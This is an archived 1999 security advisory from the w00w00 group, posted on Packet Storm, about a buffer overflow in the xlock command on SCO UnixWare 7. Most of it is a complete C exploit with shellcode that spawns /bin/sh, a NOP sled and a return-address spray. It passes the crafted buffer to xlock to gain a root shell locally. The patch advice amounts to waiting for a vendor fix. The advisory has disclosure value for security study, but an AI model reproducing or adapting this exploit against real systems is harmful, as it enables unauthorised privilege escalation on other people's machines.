unixware.xlock.txt

1999-11-26T00:00:00
ID PACKETSTORM:11371
Type packetstorm
Reporter Packet Storm
Modified 1999-11-26T00:00:00

Description

                                        
                                            `  
-----Original Message-----  
Date: Fri, 26 Nov 1999 04:29:42 +0300 (MSK)  
From: Matt Conover <shok@cannabis.dataforce.net>  
To: news@technotronic.com  
Subject: [w00giving '99 #7]: UnixWare 7's xlock  
Message-ID:  
<Pine.LNX.3.95.991126042855.31331C-100000@cannabis.dataforce.net>  
MIME-Version: 1.0  
Content-Type: TEXT/PLAIN; charset=US-ASCII  
  
w00w00 Security Development (WSD)  
http://www.w00w00.org/advisories.html  
  
Discovered by: K2 (ktwo@ktwo.ca)  
  
The xlock command on SCO's UnixWare 7 has improper bounds checking on the  
username passed (via argv[1]), which can cause a buffer overflow when  
a lengthy username is passed.  
  
----------------------------------------------------------------------------  
-  
Exploit (by K2):  
  
// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
char shell[] =  
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"  
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"  
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"  
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"  
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"  
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";  
  
#define SIZE 1200  
#define NOPDEF 601  
#define DEFOFF -400  
  
const char x86_nop=0x90;  
long nop=NOPDEF,esp;  
long offset=DEFOFF;  
char buffer[SIZE];  
  
long get_esp() { __asm__("movl %esp,%eax"); }  
  
int main (int argc, char *argv[])  
{  
register int i;  
  
if (argc > 1) offset += strtol(argv[1], NULL, 0);  
if (argc > 2) nop += strtoul(argv[2], NULL, 0);  
esp = get_esp();  
  
memset(buffer, x86_nop, SIZE);  
memcpy(buffer+nop, shell, strlen(shell));  
  
for (i = nop+strlen(shell); i < SIZE-4; i += 4)  
*((int *) &buffer[i]) = esp+offset;  
  
printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset);  
execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);  
  
printf("exec failed!\n");  
return 0;  
}  
  
----------------------------------------------------------------------------  
-  
Patch:  
  
As stated in the previous advisory, wait for SCO to release a patch.  
Because of the /var/sadm permissions vulnerability we published earlier  
hasn't been fixed yet, be sure you take off suid privileges on the backed  
up binary! =)  
----------------------------------------------------------------------------  
-  
  
Hellos to the usuals  
  
  
`